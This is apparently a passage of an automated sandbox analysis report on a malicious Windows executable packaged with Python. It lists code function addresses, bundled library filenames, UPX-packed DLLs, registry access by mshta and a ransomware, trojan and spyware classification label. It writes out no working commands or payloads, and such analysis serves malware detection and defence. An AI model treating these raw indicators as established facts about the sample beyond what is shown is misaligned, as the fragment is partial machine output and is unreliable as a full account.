              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0D92B01_2_00007FFDFB0D92B0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0E22501_2_00007FFDFB0E2250
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0C9B901_2_00007FFDFB0C9B90
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0C3C101_2_00007FFDFB0C3C10
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB172BF01_2_00007FFDFB172BF0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB11CC401_2_00007FFDFB11CC40
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0FCC591_2_00007FFDFB0FCC59
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0DCC401_2_00007FFDFB0DCC40
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB12BB001_2_00007FFDFB12BB00
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB116B401_2_00007FFDFB116B40
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB124B201_2_00007FFDFB124B20
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0E99A01_2_00007FFDFB0E99A0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0CFA101_2_00007FFDFB0CFA10
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0C288E1_2_00007FFDFB0C288E
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB1058801_2_00007FFDFB105880
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0CA8C01_2_00007FFDFB0CA8C0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0D69301_2_00007FFDFB0D6930
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB1229501_2_00007FFDFB122950
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB174FC01_2_00007FFDFB174FC0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB14BFC01_2_00007FFDFB14BFC0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0E80201_2_00007FFDFB0E8020
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0E70401_2_00007FFDFB0E7040
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB104E701_2_00007FFDFB104E70
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB15CEA01_2_00007FFDFB15CEA0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB13CF301_2_00007FFDFB13CF30
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0EDDB01_2_00007FFDFB0EDDB0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0D0DC01_2_00007FFDFB0D0DC0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB158C801_2_00007FFDFB158C80
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB11BCC01_2_00007FFDFB11BCC0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB14ACA01_2_00007FFDFB14ACA0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0D9D001_2_00007FFDFB0D9D00
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0CBD301_2_00007FFDFB0CBD30
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0DC3801_2_00007FFDFB0DC380
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB1343B01_2_00007FFDFB1343B0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0DD2B01_2_00007FFDFB0DD2B0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB10F2D01_2_00007FFDFB10F2D0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB1842B01_2_00007FFDFB1842B0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0C32F51_2_00007FFDFB0C32F5
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB14A3001_2_00007FFDFB14A300
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0EF2F01_2_00007FFDFB0EF2F0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0ED3101_2_00007FFDFB0ED310
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0C73361_2_00007FFDFB0C7336
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB1273501_2_00007FFDFB127350
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0D21E01_2_00007FFDFB0D21E0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0C41201_2_00007FFDFB0C4120
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9A4230276_2_00007FFD9A423027
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 46_2_00007FFD9A343A4D46_2_00007FFD9A343A4D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 46_2_00007FFD9A4117D946_2_00007FFD9A4117D9
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7ED188483_2_00007FF6D7ED1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EDB54083_2_00007FF6D7EDB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE54C083_2_00007FF6D7EE54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7ED82F083_2_00007FF6D7ED82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE118083_2_00007FF6D7EE1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EFAE1083_2_00007FF6D7EFAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EDABA083_2_00007FF6D7EDABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F07B2483_2_00007FF6D7F07B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE0A2C83_2_00007FF6D7EE0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F0090483_2_00007FF6D7F00904
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F038E883_2_00007FF6D7F038E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE289083_2_00007FF6D7EE2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7ED888483_2_00007FF6D7ED8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F169FD83_2_00007FF6D7F169FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F0FA6C83_2_00007FF6D7F0FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F15A7083_2_00007FF6D7F15A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EF67E083_2_00007FF6D7EF67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE17C883_2_00007FF6D7EE17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F3AAC083_2_00007FF6D7F3AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F14B3883_2_00007FF6D7F14B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F29B9883_2_00007FF6D7F29B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE86C483_2_00007FF6D7EE86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F065FC83_2_00007FF6D7F065FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F15C8C83_2_00007FF6D7F15C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EFF5B083_2_00007FF6D7EFF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE859883_2_00007FF6D7EE8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F26D0C83_2_00007FF6D7F26D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EDA50483_2_00007FF6D7EDA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F19D7483_2_00007FF6D7F19D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F21DCC83_2_00007FF6D7F21DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EFD45883_2_00007FF6D7EFD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F1AE5083_2_00007FF6D7F1AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F2FE7483_2_00007FF6D7F2FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EFC3E083_2_00007FF6D7EFC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F1EEA483_2_00007FF6D7F1EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F0037483_2_00007FF6D7F00374
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F0AF0C83_2_00007FF6D7F0AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE236083_2_00007FF6D7EE2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7ED42E083_2_00007FF6D7ED42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F3AF9083_2_00007FF6D7F3AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EED2C083_2_00007FF6D7EED2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F3DFD883_2_00007FF6D7F3DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F14FE883_2_00007FF6D7F14FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F0C00C83_2_00007FF6D7F0C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EDF24C83_2_00007FF6D7EDF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EF724483_2_00007FF6D7EF7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EEE21C83_2_00007FF6D7EEE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F300F083_2_00007FF6D7F300F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F1216483_2_00007FF6D7F12164
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EF010483_2_00007FF6D7EF0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F341CC83_2_00007FF6D7F341CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F181CC83_2_00007FF6D7F181CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F0007483_2_00007FF6D7F00074
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EFC05C83_2_00007FF6D7EFC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F0804083_2_00007FF6D7F08040
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE303083_2_00007FF6D7EE3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F2226883_2_00007FF6D7F22268
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F102A483_2_00007FF6D7F102A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F2131483_2_00007FF6D7F21314
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F05F4C83_2_00007FF6D7F05F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F2832C83_2_00007FF6D7F2832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7ED9EFC83_2_00007FF6D7ED9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EDCE8483_2_00007FF6D7EDCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE8E6883_2_00007FF6D7EE8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EDEE0883_2_00007FF6D7EDEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F1546883_2_00007FF6D7F15468
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE1E0483_2_00007FF6D7EE1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F00D2083_2_00007FF6D7F00D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EF9D0C83_2_00007FF6D7EF9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EDDD0483_2_00007FF6D7EDDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F0F59C83_2_00007FF6D7F0F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F2260C83_2_00007FF6D7F2260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE8C3083_2_00007FF6D7EE8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F2766083_2_00007FF6D7F27660
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F386D483_2_00007FF6D7F386D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F1270083_2_00007FF6D7F12700
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F0A71083_2_00007FF6D7F0A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F1071083_2_00007FF6D7F10710
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EDCB1483_2_00007FF6D7EDCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F218A883_2_00007FF6D7F218A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7ED49B883_2_00007FF6D7ED49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EFD97C83_2_00007FF6D7EFD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F1190C83_2_00007FF6D7F1190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F0D91C83_2_00007FF6D7F0D91C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: String function: 00007FF6BA3A2710 appears 104 times
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: String function: 00007FFDFAB2D425 appears 48 times
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: String function: 00007FFDFAB2D33B appears 39 times
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: String function: 00007FFDFAB2D32F appears 324 times
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: String function: 00007FFDFAB2DB03 appears 45 times
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: String function: 00007FFDFAB2D341 appears 1192 times
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: String function: 00007FFDFB0C9340 appears 112 times
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: String function: 00007FFDFB0CA500 appears 122 times
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: String function: 00007FFDFAAB1325 appears 518 times
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: String function: 00007FF6BA3A2910 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: String function: 00007FF6D7F149F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: String function: 00007FF6D7EE8444 appears 48 times
              Source: El9HaBFrFM.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: El9HaBFrFM.exeBinary or memory string: OriginalFilename vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1683960250.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWindowsActionDialog.exej% vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exeBinary or memory string: OriginalFilename vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2259497506.00007FFDFB895000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython313.dll. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2260410530.00007FFE11578000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2261417430.00007FFE1323A000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2257515754.00007FFDFB08A000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2261683576.00007FFE13326000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2260820491.00007FFE11EE8000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000000.1689886864.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWindowsActionDialog.exej% vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2262021734.00007FFE1334A000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000003.1710912781.0000025069359000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTGMacro.exeN vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2260146620.00007FFE11553000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2261009391.00007FFE130CC000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2260635150.00007FFE11EC4000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2261185050.00007FFE1320C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTGMacro.exeN vs El9HaBFrFM.exe
              Source: El9HaBFrFM.exe, 00000001.00000002.2259799869.00007FFE11513000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs El9HaBFrFM.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python313.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994153529876473
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9975483390549273
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9926987474437627
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@184/327@106/38
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EECAFC GetLastError,FormatMessageW,83_2_00007FF6D7EECAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EEEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,83_2_00007FF6D7EEEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,83_2_00007FF6D7F1B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EF3144 GetDiskFreeSpaceExW,83_2_00007FF6D7EF3144
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9164:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8432:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9112:120:WilError_03
